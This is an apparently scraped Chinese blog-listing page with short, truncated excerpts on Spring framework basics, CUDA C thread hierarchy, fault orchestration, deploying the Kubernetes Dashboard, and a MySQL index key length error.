Spring 原理 它是一个全面的、企业应用开发一站式的解决方案&#xff0c;贯穿表现层、业务层、持久层。但是 Spring仍然可以和其他的框架无缝整合。 Spring 特点 轻量级控制反转面向切面容器框架集合 Spring 核心组件 Spring 常用模块 Spring 主要包 Spring 常用注解 bean …

CUDA C:线程、线程块与线程格

相关阅读 CUDA Chttps://blog.csdn.net/weixin_45791458/category_12530616.html?spm1001.2014.3001.5482 第一百篇博客&#xff0c;写点不一样的。 当核函数在主机端被调用时&#xff0c;它会被转移到设备端执行&#xff0c;此时设备会根据核函数的调用格式产生对应的线程(…

如何应用基础故障编排?

基础故障编排是保障系统稳定性和可用性的关键环节。通过有效应用基础故障编排&#xff0c;组织能够更快速、更智能地应对系统故障&#xff0c;从而提升业务的可靠性和竞争力。本文将介绍如何应用基础故障编排! 1、选择合适的工具&#xff1a; 选择适合组织需求的基础故障编排工…

9. DashBoard

9. DashBoard 文章目录 9. DashBoard9.1 部署Dashboard9.2 使用DashBoard 在kubernetes中完成的所有操作都是通过命令行工具kubectl完成的。 为了提供更丰富的用户体验&#xff0c;kubernetes还开发了一个基于web的用户界面&#xff08;Dashboard&#xff09;。 用户可以使用…

Mysql之Specified key was too long; max key length is xx bytes异常

问题原因&#xff1a;mysq索引的字段都太长了 767字节是 MySQL 版本5.6(以及以前版本)中 InnoDB 表的最大索引前缀长度限制&#xff0c;MyISAM 表的长度为1,000字节。在 MySQL 版本5.7及以上版本中&#xff0c;这个限制增加到了3072字节。 如果对 utf8mb4编码的 varchar 字段设…